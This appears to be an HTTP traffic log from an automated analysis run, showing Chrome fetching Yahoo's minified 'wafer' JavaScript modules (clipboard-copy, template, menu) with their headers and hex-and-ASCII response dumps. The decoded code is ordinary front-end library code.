                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 488155
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-clipboard-copy",[],t):"object"==typeof exports?exports["wafer-clipboard-copy"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: tion, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function c(e,t){if(!(e instanceof t))throw new TypeError(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 63 6f 70 79 2d 74 65 78 74 22 5d 2c 68 3d 5b 22 68 61 6e 64 6c 65 43 6f 70 79 22 5d 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 6f 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 61 3d 6f 2e 73 65 6c 65 63 74 6f 72 3b 72 28 74 68 69 73 2c 74 29 3b 76 61 72 20 63 3d 6e 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 7b 73 65 6c 65 63 74 6f 72 3a 61 7d 2c 7b 53 54 41 54 45 5f 41 54 54 52 53 3a 62 7d 29 29 2c 69 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: copy-text"],h=["handleCopy"],w=function(e){function t(e){var o=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},a=o.selector;r(this,t);var c=n(this,(t.__proto__||Object.getPrototypeOf(t)).call(this,e,{selector:a},{STATE_ATTRS:b})),i=e.getAttribut
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC465INData Raw: 65 61 3b 74 7c 7c 28 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 65 78 74 61 72 65 61 22 29 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2e 73 74 79 6c 65 2c 7b 62 6f 72 64 65 72 3a 22 6e 6f 6e 65 22 2c 62 6f 78 53 68 61 64 6f 77 3a 22 6e 6f 6e 65 22 2c 64 69 73 70 6c 61 79 3a 22 6e 6f 6e 65 22 2c 68 65 69 67 68 74 3a 22 32 65 6d 22 2c 6c 65 66 74 3a 30 2c 6f 75 74 6c 69 6e 65 3a 22 6e 6f 6e 65 22 2c 70 61 64 64 69 6e 67 3a 30 2c 70 6f 73 69 74 69 6f 6e 3a 22 66 69 78 65 64 22 2c 74 6f 70 3a 30 2c 77 69 64 74 68 3a 22 32 65 6d 22 7d 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 29 2c 74 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 62 6c 6f 63 6b 22 2c 74 2e 76 61 6c 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ea;t||(t=document.createElement("textarea"),Object.assign(t.style,{border:"none",boxShadow:"none",display:"none",height:"2em",left:0,outline:"none",padding:0,position:"fixed",top:0,width:"2em"}),document.body.appendChild(t)),t.style.display="block",t.valu


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              131192.168.2.45115287.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC541OUTGET /aaq/wf/wf-template-1.4.3-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: 9Xj/yQ+6hs5SFXFDtLiQPbYfWw/CwGDo1/knSC/+XMmHTUcwPCI6o8KtnE/dQgo8P3VgoR2UqgA=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: TX80WM09K727VZ9F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Fri, 04 Oct 2024 06:17:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 21 Sep 2022 02:22:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "85070595d47a7cc86af31833110dc18a"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: h9L3Y9Rw_EkQ1yH8NskMO9BjqcI4jexa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 7907
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 392175
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 74 65 6d 70 6c 61 74 65 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 74 65 6d 70 6c 61 74 65 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-template",[],t):"object"==typeof exports?exports["wafer-template"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a cla
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 70 74 6f 72 28 74 2c 72 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 6f 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 65 28 61 2c 72 2c 6e 29 7d 69 66 28 22 76 61 6c 75 65 22 69 6e 20 6f 29 72 65 74 75 72 6e 20 6f 2e 76 61 6c 75 65 3b 76 61 72 20 69 3d 6f 2e 67 65 74 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 69 29 72 65 74 75 72 6e 20 69 2e 63 61 6c 6c 28 6e 29 7d 2c 70 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2c 64 3d 70 2e 62 61 73 65 2c 76 3d 70 2e 63 6f 6e 73 74 61 6e 74 73 2c 6d 3d 70 2e 57 61 66 65 72 42 61 73 65 43 6c 61 73 73 2c 77 3d 70 2e 75 74 69 6c 73 2c 79 3d 77 2e 67 65 74 54 65 6d 70 6c 61 74 65 43 6f 6e 74 65 6e 74 2c 68 3d 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ptor(t,r);if(void 0===o){var a=Object.getPrototypeOf(t);return null===a?void 0:e(a,r,n)}if("value"in o)return o.value;var i=o.get;if(void 0!==i)return i.call(n)},p=window.wafer,d=p.base,v=p.constants,m=p.WaferBaseClass,w=p.utils,y=w.getTemplateContent,h=w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 4c 69 73 74 65 6e 65 72 73 28 29 2c 66 7d 72 65 74 75 72 6e 20 61 28 74 2c 65 29 2c 75 28 74 2c 5b 7b 6b 65 79 3a 22 72 65 6e 64 65 72 54 65 6d 70 6c 61 74 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 6e 3d 72 2e 61 6c 6c 6f 77 52 65 72 65 6e 64 65 72 2c 6f 3d 72 2e 65 6c 65 6d 2c 61 3d 72 2e 73 75 63 63 65 73 73 43 6c 61 73 73 2c 69 3d 72 2e 74 61 72 67 65 74 53 65 6c 65 63 74 6f 72 2c 73 3d 72 2e 74 65 6d 70 6c 61 74 65 54 65 78 74 2c 6c 3d 72 2e 74 65 6d 70 6c 61 74 65 49 64 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 72 2c 63 29 7b 76 61 72 20 75 3d 69 3f 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 69 29 3a 6f 3b 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Listeners(),f}return a(t,e),u(t,[{key:"renderTemplate",value:function(e){var r=this._util,n=r.allowRerender,o=r.elem,a=r.successClass,i=r.targetSelector,s=r.templateText,l=r.templateId;return new Promise(function(r,c){var u=i?document.querySelector(i):o;o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 66 65 72 2e 6f 6e 28 72 2c 65 2e 6f 6e 57 61 66 65 72 45 76 65 6e 74 29 3b 61 26 26 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 22 2c 65 29 2e 63 61 6c 6c 28 65 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 69 63 6b 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 2d 31 21 3d 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 65 76 65 6e 74 73 2e 69 6e 64 65 78 4f 66 28 22 63 6c 69 63 6b 22 29 26 26 74 68 69 73 2e 72 65 6e 64 65 72 54 65 6d 70 6c 61 74 65 28 22 63 6c 69 63 6b 22 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: fer.on(r,e.onWaferEvent);a&&f(t.prototype.__proto__||Object.getPrototypeOf(t.prototype),"addEventListeners",e).call(e)})}},{key:"click",value:function(){-1!==this._util.events.indexOf("click")&&this.renderTemplate("click").catch(function(e){})}},{key:"onW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 74 65 72 22 5d 5d 2c 6d 6f 75 73 65 6c 65 61 76 65 3a 5b 5b 22 5f 73 65 6c 66 22 2c 22 6d 6f 75 73 65 6c 65 61 76 65 22 5d 5d 7d 3b 76 61 72 20 54 3d 4f 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 6e 3d 74 5b 72 5d 3b 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 6e 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 6e 26 26 28 6e 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2e 6b 65 79 2c 6e 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ter"]],mouseleave:[["_self","mouseleave"]]};var T=O,k=function(){function e(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(t,r,n){r
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC107INData Raw: 6d 70 6c 61 74 65 28 22 76 69 65 77 70 6f 72 74 22 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 7d 29 7d 29 7d 7d 5d 29 2c 74 7d 28 57 29 2c 41 3d 52 3b 74 2e 64 65 66 61 75 6c 74 3d 6e 65 77 20 41 28 7b 73 65 6c 65 63 74 6f 72 3a 22 2e 77 61 66 65 72 2d 74 65 6d 70 6c 61 74 65 22 7d 29 7d 7d 29 7d 29 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: mplate("viewport").catch(function(e){})})}}]),t}(W),A=R;t.default=new A({selector:".wafer-template"})}})});


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              132192.168.2.45115487.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC537OUTGET /aaq/wf/wf-menu-1.3.5-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC764INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: iaLxUMnjcBah9vHlZXnGaJes2YZ5CRh7OfEuESELn0/HUPezCWQrokBxzzb0LPA/fpHlOMjZpPTD+QfNyiEd10tRO+NEiqpC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 9D2W9T17XPZ4DZW7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Sep 2024 14:17:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 20 May 2024 05:06:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "a9df8e56a02208beacf0ded260dd1d62"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: k7mozDehHPh1alwYBSfHyyyF9CskFHrL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 8356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 1140959
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 6d 65 6e 75 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 6d 65 6e 75 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d 2c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-menu",[],t):"object"==typeof exports?exports["wafer-menu"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a func
